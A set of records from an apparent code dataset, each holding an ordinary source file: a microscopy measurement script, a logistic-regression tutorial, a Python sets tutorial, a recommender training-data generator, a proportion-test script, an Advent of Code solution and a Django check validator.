\"/Users/joel/shares/homeShareFractal/joel/fractal_v1/fractal-demos/examples/server/{artifacts-110}/workflow_000007_job_000006/metadata.json\"\n# metadata_path = \"/Users/joel/shares/homeShareFractal/joel/fractal_v1/fractal-demos/examples/server/{artifacts-110}/workflow_000007_job_000006/metadata_3D.json\"\n\nzarr_path = \"/Users/joel/Dropbox/Joel/FMI/Code/fractal/fractal-demos/examples/01_cardio_tiny_dataset/tmp_cardiac-tiny-scMultiplex/output/\"\nmetadata_path = 
\"/Users/joel/Dropbox/Joel/FMI/Code/fractal/fractal-demos/examples/server/artifacts/workflow_000015_job_000015/metadata.json\" \n\nwith open(metadata_path) as json_file:\n metadata = json.load(json_file)\n\n\ninput_channels = {\n \"C01\": {\"wavelength_id\": \"A01_C01\"}, \n # \"C02\": {\"wavelength_id\": \"A01_C02\"}, \n # \"C03\": {\"wavelength_id\": \"A02_C03\"}, \n}\nlabel_image = 'nuclei'\noutput_table_name = 'table_scmultiplex_refactor2'\nmeasure_morphology = True\nlevel = 0\nlabel_level = 0\n\n# scmultiplex task running on existing Zarr file:\nfor component in metadata[\"image\"]:\n scmultiplex_measurements(\n input_paths=[zarr_path],\n output_path=zarr_path,\n metadata=metadata,\n component=component,\n input_ROI_table = \"well_ROI_table\", #\"well_ROI_table\", #\"FOV_ROI_table\",\n input_channels = input_channels,\n label_image = label_image,\n label_level = label_level,\n level = level,\n output_table_name = output_table_name,\n measure_morphology = measure_morphology,\n )\n\n","repo_name":"fmi-basel/gliberal-scMultipleX","sub_path":"src/scmultiplex/fractal/run_measurement.py","file_name":"run_measurement.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"23982830702","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py # 为了使用h5的数据集\nfrom lr_utils import load_dataset \n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n'''\n train_set_x_orig 训练集x的图像数据\n train_set_y 训练集y的二分值 [0, 1]\n test_set_x_orig 测试集x的图像数据\n test_set_y 测试集y的二分值 [0, 1]\n classes 保存以bytes类型的两个字符串数据\n'''\nm_train = train_set_y.shape[1] # 训练集里面照片的数量\n# 因为train_y.shape(1, m)\nm_test = test_set_y.shape[1] # 测试集里面照片的数量\n# 因为test_y.shape(1, m)\nnum_px = train_set_x_orig.shape[1] # 训练、测试集里面的图片的宽度和高度\n\nprint(\"训练集的数量: m_train = \" + str(m_train))\nprint(\"测试集的数量: m_test = \" + str(m_test))\nprint(\"每张图片的宽/高 : num_px = \" + str(num_px))\nprint(\"每张图片的大小: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\nprint(\"训练集_图片的维度: \" + str(train_set_x_orig.shape))\nprint(\"训练集_标签的维度: \" + str(train_set_y.shape))\nprint(\"测试集_图片的维度: \" + str(test_set_x_orig.shape))\nprint(\"测试集_标签的维度: \" + str(test_set_y.shape))\n\n# 将训练集的维度降低并转置\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\n# 将测试集的维度降低并转置\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n# 在reshape中-1就是让解释器去运算数组变成矩阵后有多少列。而ndarray.T就是转置\n\nprint(\"----------------------------------------------------------\")\nprint(\"训练集降维最后的维度: \" + str(train_set_x_flatten.shape))\nprint(\"训练集_标签的维度: \" + str(train_set_y.shape))\nprint(\"测试集降维最后的维度: \" + str(test_set_x_flatten.shape))\nprint(\"测试集_标签的维度: \" + str(test_set_y.shape))\n\n'''\n 为了显示色彩,我们需要将矩阵的每一个数据集除以255\n 因为色彩的表示是用RGB通道,像素值在区间[0, 255]因此,除以255能够让数据位于[0, 1]区间\n'''\ntrain_set_x = train_set_x_flatten / 255\ntest_set_x = test_set_x_flatten / 255\n\n# 到这里,数据的准备就完成了\n\ndef sigmoid(z) :\n \"\"\"\n param :\n z -- 任何大小的标量或numpy数组\n \n return var :\n s -- sigmoid(z)\n \"\"\"\n s = 1 / (1 + np.exp(-z))\n return s\n\ndef initialize_zeros(dim) :\n \"\"\"\n 此函数为dw创建一个维度为(dim, 1)的0向量,并将db初始化为0\n param :\n dim -- 我们想要的dw矢量大小\n \n return var :\n dw -- 维度为(dim, 1)的初始化向量\n db -- 初始化的标量(对应于偏差)\n \"\"\"\n dw = np.zeros((dim, 1))\n db = 0\n \n assert(dw.shape == (dim, 1))\n assert(isinstance(db, float) or isinstance(db ,int))\n return (dw, db)\n\ndef propagate(w, b, X, Y) :\n \"\"\"\n 实现前向和后向传播的成本函数以及梯度下降\n param :\n w -- 
权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 矩阵类型为(num_px * num_px * 3, m)\n Y -- 真正的\"标签\"矢量,矩阵维度为(1, m)\n \n return var :\n cost -- Logistic Regression cost function\n dw -- 相对于w的损失梯度,因此与w相同的形状\n db -- 相对于b的损失梯度,因此与b相同的形状\n \"\"\"\n m = X.shape[1]\n \n # 正向传播\n A = sigmoid(np.dot(w.T, X) + b) # 计算激活函数值\n cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A)) # 计算成本函数\n \n # 反向传播\n dw = (1 / m) * np.dot(X, (A - Y).T)\n db = (1 / m) * np.sum(A - Y)\n \n # 判断数据\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n # 创建字典,保存dw,db\n grads = {\n \"dw\" : dw, \n \"db\" : db\n }\n return (grads, cost)\n\ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False) :\n \"\"\"\n 此函数通过运行梯度下降算法来优化w和b\n param :\n w -- 权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 维度为(num_px * num_px * 3, m)\n Y -- 真正的\"标签\"矢量,矩阵维度为(1, m)\n num_iterations -- 优化循环的迭代次数\n learning_rate -- 梯度下降更新规则的学习率\n print_cost -- 每一百步打印一次损失值\n \n return var :\n params -- 包含权重w和偏差b的字典\n grads -- 包含权重和偏差相对于成本函数梯度下降的字典\n costs -- 优化期间计算的所有成本列表,将用于绘制学习曲线\n \n tips :\n 我们需要写下两步并遍历 :\n 1) 计算当前参数的成本和梯度下降,使用propagate()\n 2) 使用w和b的梯度下降更新参数\n \"\"\"\n \n costs = []\n \n for i in range(num_iterations) :\n grads, cost = propagate(w, b, X, Y)\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n w = w - learning_rate * dw\n b = b - learning_rate * db\n \n # 记录成本\n if i % 100 == 0 :\n costs.append(cost)\n # 打印成本数据 -- 100步打印一次\n if (print_cost) and (i % 100 == 0) :\n print(\"迭代的次数: %i, 误差值: %f\"% (i, cost))\n \n params = {\n \"w\" : w,\n \"b\" : b\n }\n grads = {\n \"dw\" : dw,\n \"db\" : db\n }\n return (params, grads, costs)\n\ndef predict (w, b, X) :\n \"\"\"\n 使用学习逻辑回归参数logistic(w, b) 预测标签是0还是1\n param :\n w -- 权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 维度为(num_px * num_px * 3, m)\n \n return var :\n Y_prediction -- 包含X中所有图片的预测值的一个numpy数组\n \"\"\"\n \n m = X.shape[1] # 图片的数量\n Y_prediction = np.zeros((1, m))\n w = w.reshape(X.shape[0], 1)\n \n # 计算预测猫在图片中出现的概率\n A = sigmoid(np.dot(w.T, X) + b)\n for i in range(A.shape[1]) :\n # 将概率a[0, i]转换为实际预测p[0, i]\n Y_prediction[0, i] = 1 if A[0, i] > 0.5 else 0\n # 如果实际概率大于0.5就认为是猫\n \n # 判断数据\n assert (Y_prediction.shape == (1, m))\n \n return Y_prediction\n\ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False) :\n \"\"\"\n 通过调用之前实现的函数来构建逻辑回归模型\n param :\n X_train -- numpy的数组,维度为(num_px * num_px * 3, m_train)的训练集\n Y_train -- numpy的数组,维度为(1, m_train)(矢量)的训练标签集\n X_test -- numpy的数组,维度为(num_px * num_px * 3, m_test)的测试集\n Y_test -- numpy的数组,维度为(1, m_test)(向量)的测试标签集\n num_iterations -- 表示用于优化的迭代次数的超参数\n learning_rate -- 表示optimize() 更新规则中使用的学习速率的超参数\n print_cost -- 设置为True以100为频率迭代打印成本\n \n return var :\n d -- 包含有关模型信息的字典\n \"\"\"\n \n w, b = initialize_zeros(X_train.shape[0])\n \n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)\n \n # 从字典参数中检索参数w和b\n w, b = parameters[\"w\"], parameters[\"b\"]\n \n # 预测测试/训练集的例子\n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n \n # 打印训练后的准确性\n print(\"训练集准确性: \", format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100), \"%\")\n print(\"测试集准确性: \", format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100), \"%\")\n \n d = {\n \"costs\" : costs,\n \"Y_prediction_test\" : Y_prediction_test,\n \"Y_prediction_train\" : Y_prediction_train,\n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : 
learning_rate,\n \"num_iterations\" : num_iterations\n }\n return d\n\nd = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True)\n\n# 绘制图像\ncosts = np.squeeze(d[\"costs\"])\nplt.plot(costs)\nplt.ylabel(\"cost\", size = 14)\nplt.xlabel(\"iterations (per hundreds)\", size = 14)\nplt.title(\"Learning rate = \" + str(d[\"learning_rate\"]), fontsize = 20)\nplt.savefig(\"Learning Rate.jpg\")\nplt.show()","repo_name":"ChenMiaoi/codeProgram","sub_path":"python/deepinglearning/NeuralNetWorks/LogisticRegression_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8693,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
+{"seq_id":"20029345767","text":"'''\nSet\nSets are used to store multiple items in a single variable.\n\nSet is one of 4 built-in data types in Python used to store collections of data, the other 3 are List, Tuple, and Dictionary, all with different qualities and usage.\n\nA set is a collection which is unordered, unchangeable*, and unindexed.\n\n* Note: Set items are unchangeable, but you can remove items and add new items.\n\nSets are written with curly brackets.\n'''\n\n# Create a Set:\n\nthisset = {\"apple\", \"banana\", \"cherry\"}\nprint(thisset)\n\n# Duplicate values will be ignored:\n\nthisset = {\"apple\", \"banana\", \"cherry\", \"apple\"}\n\nprint(thisset)\n\n# Get the number of items in a set:\n\nthisset = {\"apple\", \"banana\", \"cherry\"}\n\nprint(len(thisset))\n\n# String, int and boolean data types:\n\nset1 = {\"apple\", \"banana\", \"cherry\"}\nset2 = {1, 5, 7, 9, 3}\nset3 = {True, False, False}\n\n# A set with strings, integers and boolean values:\n\nset1 = {\"abc\", 34, True, 40, \"male\"}\nprint(type(set1))\n\n# What is the data type of a set?\n\nmyset = {\"apple\", \"banana\", \"cherry\"}\nprint(type(myset))\n\n# Using the set() constructor to make a set:\n\nthisset = set((\"apple\", \"banana\", \"cherry\")) # note the double round-brackets\nprint(thisset)\n","repo_name":"bogaraviteja/python-basics","sub_path":"python/03_data_structures/03_sets/01_sets.py","file_name":"01_sets.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"9502751695","text":"import math\nimport random\nimport sqlite3\nfrom typing import List\n\nimport numpy\nimport pandas\nfrom pandas import DataFrame\nfrom tqdm import tqdm\n\nfrom data_process.data_reader.data_enum import DataSetEnum, DataTypeEnum, REVIEW_COUNT, RANDOM_STATE, get_all_dataset\nfrom data_process.data_reader.process_raw_data import load_processed_data, split_train_dev_test_data\nfrom data_process.data_reader.train_data_file import TrainDataFile, TRAIN_DATA_PATH\nfrom tool.log_helper import logger\nfrom tool.path_helper import ROOT_DIR\n\n\nclass DataUtil:\n def __init__(self, data: DataFrame, known_data: DataFrame,\n data_set: DataSetEnum, data_type: DataTypeEnum):\n\n self.data = data\n self.known_data = known_data\n self.data_set = data_set\n self.data_type = data_type\n\n self.table_name = data_set.value\n self.db_conn = self.create_memory_db()\n self.rand = random.Random(RANDOM_STATE)\n\n self.review_cache, self.rating_cache = self.get_review_rating_cache()\n self.user_sim_cache = dict()\n\n def __del__(self):\n # delete in-memory db\n self.db_conn.close()\n\n def create_memory_db(self):\n logger.info(f\"creating in-memory db {self.table_name}...\")\n conn = sqlite3.connect(':memory:')\n c = 
conn.cursor()\n self.known_data[[\"userID\", \"itemID\", \"rating\"]].to_sql(self.table_name, conn, index=False)\n c.execute(f\"CREATE INDEX user_idx on {self.table_name} (userID)\")\n c.execute(f\"CREATE INDEX item_idx on {self.table_name} (itemID)\")\n c.execute(f\"CREATE INDEX user_item_idx on {self.table_name} (userID, itemID)\")\n conn.commit()\n return conn\n\n def get_review_rating_cache(self):\n logger.info(f\"creating review and rating cache...\")\n review_cache, rating_cache = dict(), dict()\n iterator = zip(self.known_data[\"userID\"], self.known_data[\"itemID\"], self.known_data[\"review\"], self.known_data[\"rating\"])\n for user, item, review, rating in iterator:\n if user in review_cache:\n review_cache[user][item] = review\n rating_cache[user][item] = rating\n\n else:\n review_cache[user] = {item: review}\n rating_cache[user] = {item: rating}\n return review_cache, rating_cache\n\n def create_data_file(self):\n data_len = len(self.data)\n train_data = TrainDataFile(self.data_set, self.data_type)\n train_data.create_file(data_len)\n\n for idx, row in tqdm(enumerate(self.data.itertuples()), total=data_len, desc=\"Generating Train Data\"):\n user, item = row.userID, row.itemID\n train_data.user_id[idx] = user\n train_data.item_id[idx] = item\n train_data.rating[idx] = row.rating\n self.write_review_in_one(train_data, idx, user, item)\n self.write_self_review(train_data, idx, user, item)\n self.write_pos_review(train_data, idx, user, item)\n self.write_ref_review(train_data, idx, user, item)\n\n train_data.flush()\n logger.info(f\"Train file saved to {train_data.out_path}\")\n\n def write_self_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, ids = self.get_user_item_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_review[idx, 0:chunk_len] = reviews\n train_data.reviewed_item[idx, 0:chunk_len] = ids\n\n reviews, ids = self.get_user_item_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_review[idx, 0:chunk_len] = reviews\n train_data.reviewing_user[idx, 0:chunk_len] = ids\n\n def get_user_item_review(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n exclude_key = \"itemID\"\n user_id_index = 0\n item_id_index = 1\n else:\n query_key = \"itemID\"\n exclude_key = \"userID\"\n user_id_index = 1\n item_id_index = 0\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select {query_key}, {exclude_key} \"\n f\"from {self.table_name} \"\n f\"where {query_key} == {query_id} and {exclude_key} != {exclude_id}\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, ids = [], []\n for row in cursor:\n reviews.append(self.review_cache[row[user_id_index]][row[item_id_index]])\n ids.append(row[1])\n\n return reviews, ids\n\n def write_review_in_one(self, train_data: TrainDataFile, idx, user, item):\n review, _ = self.get_user_item_review_in_one(user, item, \"user_review\")\n train_data.user_review_in_one[idx, 0:len(review)] = review\n\n review, _ = self.get_user_item_review_in_one(item, user, \"item_review\")\n train_data.item_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_auxiliary_review_in_one(user, item)\n train_data.user_auxiliary_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_supplementary_review_in_one(user, item)\n 
train_data.user_supplementary_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_ref_review_in_one(user, item)\n train_data.user_ref_review_in_one[idx, 0:len(review)] = review\n\n def get_user_item_review_in_one(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n exclude_key = \"itemID\"\n else:\n query_key = \"itemID\"\n exclude_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select userID, itemID \"\n f\"from {self.table_name} \"\n f\"where {query_key} == {query_id} and {exclude_key} != {exclude_id}\")\n\n reviews = self.read_review_in_one_from_db(cursor, REVIEW_COUNT)\n return reviews\n\n def get_user_auxiliary_review_in_one(self, user_id: int, exclude_item: int):\n review, still_need = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, 0)\n\n # More auxiliary at rating + 1\n if still_need > 0:\n new_review, still_need = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, 1, still_need)\n review.extend(new_review)\n\n # More auxiliary at rating - 1\n if still_need > 0:\n new_review, _ = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, -1, still_need)\n review.extend(new_review)\n\n return review\n\n def get_user_auxiliary_review_in_one_diff(self, user_id: int, exclude_item: int, rating_diff: int, limit: int = REVIEW_COUNT):\n \"\"\"\n Query and read auxiliary reviews with the given condition.\n :param user_id: User id.\n :param exclude_item: Item id.\n :param rating_diff: The rating difference. E.g.: 0 means same rating.\n :param limit: How many reviews are needed.\n :return: review document, how many reviews are still needed.\n \"\"\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.itemID == y.itemID \"\n f\"where x.userID == {user_id} \"\n f\"and x.userID != y.userID \"\n f\"and y.rating == (x.rating + {rating_diff}) \"\n f\"and y.itemID != {exclude_item}\")\n\n reviews, review_count = self.read_review_in_one_from_db(cursor, limit)\n return reviews, limit - review_count\n\n def read_review_in_one_from_db(self, cursor, limit: int) -> (list, int):\n \"\"\"\n Read and join multiple reviews into one document.\n :param cursor: Database query result.\n :param limit: How many reviews are needed.\n :return: review document, how many reviews were actually read.\n \"\"\"\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, limit)\n reviews = []\n review_read = 0\n for row in cursor:\n review_read += 1\n review_i = self.review_cache[row[0]][row[1]]\n review_i = [word for word in review_i if word != 0] # Remove padding (word id 0).\n reviews.extend(review_i)\n return reviews, review_read\n\n def get_user_supplementary_review_in_one(self, user_id: int, exclude_item: int):\n reviews = []\n bought_items = self.rating_cache[user_id].keys()\n for item_id in bought_items:\n if item_id != exclude_item:\n sim_buyers = self.get_similar_buyer(user_id, item_id)\n if len(sim_buyers) == 0:\n return []\n\n similarity = [self.get_user_similarity(user_id, sim_buyer) for sim_buyer in sim_buyers]\n max_index = numpy.argmax(similarity).item()\n reviews.append(self.review_cache[sim_buyers[max_index]][item_id])\n if len(reviews) >= REVIEW_COUNT:\n break\n\n review_in_one = []\n for r in reviews:\n review_in_one.extend([word for word in r if word != 0]) # Remove padding (word id 0).\n return review_in_one\n\n def 
get_similar_buyer(self, user_id: int, item_id: int) -> List[int]:\n self_rating = self.rating_cache[user_id][item_id]\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select userID \"\n f\"from {self.table_name} \"\n f\"where itemID == {item_id} \"\n f\"and userId != {user_id} \"\n f\"and abs(rating - {self_rating}) <= 1\")\n return [row[0] for row in cursor]\n\n def get_user_similarity(self, user1: int, user2: int) -> float:\n if user1 == user2:\n logger.warning(\"Calculate similarity between same user.\")\n return 1\n\n key = (min(user1, user2), max(user1, user2))\n if key in self.user_sim_cache:\n return self.user_sim_cache[key]\n else:\n sim = self.cal_user_similarity(user1, user2)\n self.user_sim_cache[key] = sim\n return sim\n\n def cal_user_similarity(self, user1: int, user2: int) -> float:\n items1 = self.rating_cache[user1].keys()\n items2 = self.rating_cache[user2].keys()\n common_items = set(items1) & set(items2)\n\n ratings1 = numpy.array([self.rating_cache[user1][item] for item in items1])\n ratings2 = numpy.array([self.rating_cache[user2][item] for item in items2])\n common_ratings1 = numpy.array([self.rating_cache[user1][item] for item in common_items])\n common_ratings2 = numpy.array([self.rating_cache[user2][item] for item in common_items])\n\n temp = ((common_ratings1 - common_ratings1.mean()) * (common_ratings2 - common_ratings2.mean())).sum()\n sim = math.sqrt(len(common_items)) * temp / (ratings1.std() * ratings2.std())\n\n if numpy.isnan(sim):\n sim = - numpy.inf\n return sim\n\n def get_user_ref_review_in_one(self, user_id: int, exclude_item: int):\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.itemID == y.itemID \"\n f\"where x.userID == {user_id} \"\n f\"and x.userID != y.userID \"\n f\"and y.itemID != {exclude_item}\")\n\n reviews, review_count = self.read_review_in_one_from_db(cursor, REVIEW_COUNT)\n return reviews\n\n def write_pos_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, user_ids, item_ids = self.get_user_item_pos_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_pos_review[idx, 0:chunk_len] = reviews\n train_data.user_pos_user_id[idx, 0:chunk_len] = user_ids\n train_data.user_pos_item_id[idx, 0:chunk_len] = item_ids\n\n reviews, user_ids, item_ids = self.get_user_item_pos_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_pos_review[idx, 0:chunk_len] = reviews\n train_data.item_pos_user_id[idx, 0:chunk_len] = user_ids\n train_data.item_pos_item_id[idx, 0:chunk_len] = item_ids\n\n def get_user_item_pos_review(self, query_id: int, exclude_id: int, review_type: str):\n if review_type == \"user_review\":\n query_key = \"userID\"\n join_key = \"itemID\"\n else:\n query_key = \"itemID\"\n join_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.{join_key} == y.{join_key} \"\n f\"where x.{query_key} == {query_id} \"\n f\"and x.{query_key} != y.{query_key} \"\n f\"and y.{join_key} != {exclude_id} \"\n f\"and abs(x.rating - y.rating) <= 1\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, user_ids, item_ids = [], [], []\n for row in cursor:\n 
reviews.append(self.review_cache[row[0]][row[1]])\n user_ids.append(row[0])\n item_ids.append(row[1])\n\n return reviews, user_ids, item_ids\n\n def write_ref_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, user_ids, item_ids, self_rating, other_rating = self.get_user_item_ref_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_ref_review[idx, 0:chunk_len] = reviews\n train_data.user_ref_user_id[idx, 0:chunk_len] = user_ids\n train_data.user_ref_item_id[idx, 0:chunk_len] = item_ids\n train_data.user_ref_self_rating[idx, 0:chunk_len] = self_rating\n train_data.user_ref_other_rating[idx, 0:chunk_len] = other_rating\n\n reviews, user_ids, item_ids, self_rating, other_rating = self.get_user_item_ref_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_ref_review[idx, 0:chunk_len] = reviews\n train_data.item_ref_user_id[idx, 0:chunk_len] = user_ids\n train_data.item_ref_item_id[idx, 0:chunk_len] = item_ids\n train_data.item_ref_self_rating[idx, 0:chunk_len] = self_rating\n train_data.item_ref_other_rating[idx, 0:chunk_len] = other_rating\n\n def get_user_item_ref_review(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n join_key = \"itemID\"\n else:\n query_key = \"itemID\"\n join_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem, x.rating as selfRating, y.rating as otherRating \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.{join_key} == y.{join_key} \"\n f\"where x.{query_key} == {query_id} \"\n f\"and x.{query_key} != y.{query_key} \"\n f\"and y.{join_key} != {exclude_id}\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, user_ids, item_ids, self_rating, other_rating = [], [], [], [], []\n for row in cursor:\n reviews.append(self.review_cache[row[0]][row[1]])\n user_ids.append(row[0])\n item_ids.append(row[1])\n self_rating.append(row[2])\n other_rating.append(row[3])\n\n return reviews, user_ids, item_ids, self_rating, other_rating\n\n def reservoir_sampling(self, cursor, sample_k: int):\n \"\"\"\n Memory friendly sample method.\n https://www.geeksforgeeks.org/reservoir-sampling/\n \"\"\"\n result = []\n for t, item in enumerate(cursor):\n if t < sample_k:\n result.append(item)\n else:\n m = self.rand.randint(0, t)\n if m < sample_k:\n result[m] = item\n return result\n\n\ndef generate_train_data(data_set: DataSetEnum):\n logger.info(\"loading processed data...\")\n all_data = load_processed_data(data_set)\n train, dev, test = split_train_dev_test_data(all_data)\n\n data_util = DataUtil(train, train, data_set, DataTypeEnum.Train)\n data_util.create_data_file()\n\n data_util = DataUtil(dev, pandas.concat([train, dev]), data_set, DataTypeEnum.Dev)\n data_util.create_data_file()\n\n data_util = DataUtil(test, all_data, data_set, DataTypeEnum.Test)\n data_util.create_data_file()\n\n\ndef main():\n overwrite = False\n for data_set in get_all_dataset():\n logger.info(f\"-------- Creating train data for {data_set}... 
--------\")\n train_data_path = TRAIN_DATA_PATH % (data_set, DataTypeEnum.Train)\n processed = ROOT_DIR.joinpath(train_data_path).exists()\n if not overwrite and processed:\n logger.warning(f\"{data_set} is skipped because processed file already exist.\")\n continue\n\n generate_train_data(data_set)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KindRoach/HRFA","sub_path":"data_process/data_reader/generate_train_data.py","file_name":"generate_train_data.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34394268570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 11:23:33 2019\n\n@author: FQ538HD\n\"\"\"\n\nold_p = 23 # % which were leading to high return rates from clients.\nsignificance = 95 # %\ndesired_p = 18 # %\nn = 150 # spoons\nspoon_defects = 23 # % spoons have defects.\n\nfrom utils import SpoonsData\n\nnew_p = 100 * spoon_defects / n\n\ndata = SpoonsData()\ndata.set_data(p=desired_p)\ndata.proportion_testing_result(n=n, new_mean=new_p, significance=significance)\n","repo_name":"ricardoleoncorreia/statistics-with-python","sub_path":"ex6/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32082431463","text":"#!/usr/bin/env python3\n\n\ndef step1(bin_list): \n gamma = ''\n epsilon = ''\n\n for bit in range(len(bin_list[0])):\n sum_of_0 = sum(number[bit] == '0' for number in bin_list)\n sum_of_1 = sum(number[bit] == '1' for number in bin_list)\n\n gamma += '0' if sum_of_0 > sum_of_1 else '1'\n epsilon += '1' if sum_of_0 > sum_of_1 else '0'\n \n return int(gamma, 2) * int(epsilon, 2)\n \n \ndef step2(bin_list):\n return 0\n\n\nwith open('data.txt', 'r') as file:\n data = file.read().splitlines()\nprint(step1(data))\n","repo_name":"pierre-castro/aoc_2021","sub_path":"Day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445088458","text":"from typing import List\n\nfrom django.core.exceptions import ValidationError\n\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass CheckValidator:\n @staticmethod\n def validate(validators: str, value: any, *args, **kwargs) -> bool:\n validators: List[str] = validators.split(\",\")\n\n # logger.debug(\"VALIDATORS: %s\", validators)\n\n for validator in validators:\n if len(validator.strip()) > 0:\n if not hasattr(CheckValidator, validator):\n raise ValidationError(\n \"A validator was defined ({}), but the method is not defined\".format(\n validator\n )\n )\n # logger.debug(\n # \"Validating value %s (%s) with validator %s\",\n # value,\n # type(value).__name__,\n # validator,\n # )\n if not getattr(CheckValidator, validator)(value=value, *args, **kwargs):\n return False\n\n return True\n\n @staticmethod\n def is_number(value: any, *args, **kwargs) -> bool:\n if isinstance(value, int) or isinstance(value, float):\n return True\n return False\n\n @staticmethod\n def is_positive_number(value: any, *args, **kwargs) -> bool:\n return CheckValidator.is_number(value) and int(value) >= 0\n\n @staticmethod\n def validate_estimate(value: any, *args, **kwargs):\n return CheckValidator.is_positive_number(value)\n \n @staticmethod\n def validate_responsible_unique(value, *args, 
**kwargs):\n from apps.visums.models import LinkedParticipantCheck\n\n linked_participant_check = LinkedParticipantCheck.objects.safe_get(visum=value.sub_category.category.category_set.visum, linked_to=value.parent.linked_to, raise_error=True)\n\n if linked_participant_check.participants.count() > 0 and linked_participant_check.first().participant.group_admin_id == kwargs.get(\"group_admin_id\"):\n raise ValidationError(\"Je mag niet twee keer dezelfde kampverantwoordelijke opgeven.\")\n\n return True\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/visums/utils/check_validator.py","file_name":"check_validator.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
